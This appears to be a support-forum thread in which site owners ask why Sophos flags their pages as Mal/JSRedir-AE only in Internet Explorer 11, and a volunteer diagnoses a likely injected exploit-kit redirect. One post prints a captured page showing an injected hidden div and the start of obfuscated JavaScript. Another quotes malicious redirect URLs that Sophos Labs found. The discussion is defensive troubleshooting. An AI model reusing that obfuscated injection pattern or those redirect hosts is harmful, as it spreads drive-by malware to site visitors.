While browsing the web, Sophos web control bock some website if we use IE 11 with the information : Malicious Content Blocked Mal/JSRedir-AE.
Sophos didn't detect anything on the same website with Google Chrome.
Where is the real problem ? It is sophos and IE11 or the website ?
Our solution :
we had to restore an old backup...
Hello Roger,
a work around for this issue
ok, let's first agree on what the issue is. Please have a look at the analysis for Mal/JSRedir-AE. Guess you shouldn't take it lightly and I wouldn't recommend to work around it If you look at its Summary page you see "Please send us a sample" (not possible though if it's blocked by download scanning) and that it's a generic detection which suggests it could be harmless but shouldn't indiscriminately be regarded as safe.
@Eric and @Roger (and TWIMC)
As to different results for different browsers: Web pages try to be "smart" and tune the page for "optimum user experience" depending on the browser. Thus different scripts, style sheets, and so on might be loaded for different browsers. Unlikely that a redirection is needed to serve important content only when viewed with IE, or? More likely that the (admittedly potential) exploit kit is crafted for IE.
On of the possible payloads for these drive-by attacks is ransomware (the kind that encrypts your files). Ransomware is not delivered for every request though, it's deliberately served only for a small fraction to "protect" the actual source of the threat. From the user's POV kinda inverse lottery. You don't want to be the one which hits the sh*tpot.
So, please, don't think these detections are written just to annoy you
Christian
Christian
Please trust me when I say that I am not taking this lightly however I have had my web developer scan my site multiple times specifically looking for the signatures defined by Sophos. He cannot find any evidence of the virus with the tools we have, If you will browse to my site do you see the issue and can you tell me what item in the site is infected.
I personally have scanned my web page with https://app.webinspector.comand and that online scanner found no issues.
With my workaround I have not disabled your product I continue to use the Download scanning option on all websites including the one mentioned; however it appears to be a false positive as after I do the workaround the page is no longer detected as malicious even after reboot and clearing cache.
Since this is my website I am concerned about this situation and want to make certain the problem is resolved.
The only detection I get is from the Sophos installed web protection when running IE. I do understand about the different modules loading for different web browsers.
Any help would be appreciated.
Roger
Hello Roger,
I'm not Sophos ... anyway, here's part of what's returned when I access the site with IE:
HTTP/1.1 200 OK
Date: Thu, 28 Jan 2016 11:35:47 GMT
Server: Apache
Set-Cookie: _PHP_SESSION_PHP=423; expires=Thu, 04-Feb-2016 11:35:47 GMT; path=/
Content-Type: text/html; charset=utf-8
Connection: close
<!--//--><script> function moveTo(){return true;}function resizeTo(){return true;}
</script>
<div id="cvmythmetwel" class="qutbzmrvstg">bgbw. bodla, gajbyakeocrdzabbva r aw bvcdbl
cl ddamanbx dbasazb zakdudbaya mbzblaoaqa paneg cseodfd zdle. sc y aa. dneudv egdfdhcoe.
pd rdyc uegdgecacd laibjci, cl axa wc sbl aacfatbuakecdnawcvag azakbmbxbt avcibfcdajbwbabu
dydidwd webcocoaybn bbckcreadge cadd abbcl, bjclakdrcwefalcdambic nck ajdv cla vacbu
a lal agbhctex cpdza lbla fcpagb zcl, budjabahb paecl bddz d eecc qebchbeabafbqbnchav.
bma zccaycla - cccaldmdzd ydtdlas; aj b yahed: d j eudbbv becsacbkcabp c qcmc pbiaobibdebb
bblbzduboafblboaqamapeg c s - efbcboa mcl aldf a fbiexbt a l albcbjctejcqca bbb zakdfdheqbybgataeafbzanbuaqcjagb
x aw d lay. clblbzawamdebnanb la xbrback adan bfcfbhdsdgd nddekbfbucpbwag buasdqdddx
dtecajba df buakclb fbvb 'be' id h agdnbmbpdtae dq ctcbb. bbvaubiddeoac drbdeobyccaya
rbbetc zcbacbta. j; b nat dgatckb, rbzd ndodg b vajbka zbq: ake cavcqaiedelbyanawayeucm
erazcbaiclald fa. fbib wbuaq; anag, bjb - de qazbyb bblaldjbfbzcbb ualadambvabbxb
c b i azbv ak dlbbchcac, aa ncyal bpacerbe bobdcl alcrcqblcachal ab aaeabfckai e
q aeb. vbf cnaebkcbbpc q dfdlepcvb war, bjdr epd idjdldzcgcjd basdpex cndx cwexdrb
l dcagdo emej btaqagb c budeemcwe k d: reacsdq, aoclccby a n - drcwem dm dydm! erdfdx
apd cazcd c i c 97 lctdqctbiagbgcsdscsej</div>
<div id="bncwobbltqjmy" class="qutbzmrvstg">VQZybhFoVxGoJf6k</div>
<script>
var szunqcjoooqqlez=(43655183>1644902541?"o":"\x72\x65");
var pafbknmwhiahkk=(1493789990<263569207?"woc":"p"); .....
I'd say this doesn't look really innocent. Injections are often cleverly hidden from local inspection. Don't ask me where but it is there.
I don't know of a specific contact at Sophos (and under which conditions and to what extent they will assist in cleaning the site) so you'd have to start with giving Support a call.
Christian
Behaviour is confirmed for the page http://www.campaignforeducation.org . Site seems to be clean, we sent a short notification to the site admin.
Sophos UTM9
Firmware version: 9.355-1
Pattern version: 99487
I am experiencing the same issue with my site. I too have used many site scanners and found nothing. Have discovered a solution?
Hello MarkHarris,
the same issue
meaning you (or someone else) get a Mal/JSRedir-xx alert when browsing with IE11 and otherwise not, or?
with my site
sorry, but I (and probably this is true for many others) am not aware and knowledgeable about you and your site, should I be?
a solution
one of two: Either the alert is genuine and your site is compromised then you have to clean it. Or it's a false positive , for this please see Sophos reports that a website is blocked or has access restricted.
Christian
Christian, as in my own site (www.harrisdigi.com) [and a couple of others I have tested on the shared hosting] are receiving the alert.
The requested location contains malicious content, identified as Mal/JSRedir-AE
I had labs look at the alert, and got the following
" Initial access to the website harrisdigi.com shows redirection to :
scheinecontactaient.contract-ready.com/stun/sheep-22493962
scheinecontactaient.contract-ready.com/monk/mental-32003369.swf"
I do not know where the redirect code is being called. the logs of Sophos don't list it. I cant watch the page information load on my computer to determine the call because Sophos blocks it. this does not occur in any browser even edge so I cant watch the loading.
what tool did you use to illustrate the code presence in the other site?
I have searched my hosting directories, but found nothing I could attribute the redirect too. If I knew the file called just before the redirect I might be able to correct the issue.
